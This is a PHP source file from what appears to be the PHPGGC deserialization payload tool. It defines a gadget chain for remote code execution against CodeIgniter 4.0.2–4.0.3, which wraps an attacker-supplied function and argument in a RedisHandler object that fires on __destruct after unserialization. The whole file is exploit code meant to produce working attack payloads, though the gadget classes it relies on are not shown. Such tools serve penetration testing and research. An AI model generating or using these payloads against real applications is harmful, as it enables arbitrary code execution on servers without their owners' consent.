Codebase list phpggc / b0b08ab gadgetchains / CodeIgniter4 / RCE / 1 / chain.php
b0b08ab

Tree @b0b08ab (Download .tar.gz)

chain.php @b0b08abraw · history · blame

<?php

namespace GadgetChain\CodeIgniter4;

class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
{
    public static $version = '4.0.2 <= 4.0.3';
    public static $vector = '__destruct';
    public static $author = 'eboda';

    public function generate(array $parameters)
    {
        $function = $parameters['function'];
        $parameter = $parameters['parameter'];

        return new \CodeIgniter\Cache\Handlers\RedisHandler($function, $parameter);
    }
}